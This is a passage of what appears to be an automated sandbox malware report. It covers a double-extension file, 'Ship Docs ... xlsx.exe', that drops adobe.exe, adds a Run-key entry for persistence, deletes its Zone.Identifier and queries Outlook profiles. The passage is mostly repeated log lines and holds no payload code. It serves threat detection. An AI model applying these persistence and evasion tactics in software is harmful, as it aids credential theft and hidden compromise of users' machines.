                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_02B00C6D push edi; retf 1_2_02B00C7A
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_066C9F31 pushfd ; iretd 1_2_066C9F32
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_066CBAB0 push es; ret 1_2_066CBAC0
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_066C7952 push es; ret 1_2_066C7960
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_01947D81 pushfd ; iretd 3_2_01947D82
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_01940C6D push edi; retf 3_2_01940C7A
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_06D2E312 push ss; retf 3_2_06D2E31A
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_01080C6D push edi; retf 8_2_01080C7A

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeFile written: C:\Users\user\AppData\Roaming\Adobe\adobe.exeJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeFile created: C:\Users\user\AppData\Roaming\Adobe\adobe.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobeJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobeJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeFile opened: C:\Users\user\AppData\Roaming\adobe\adobe.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: Possible double extension: xlsx.exeStatic PE information: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
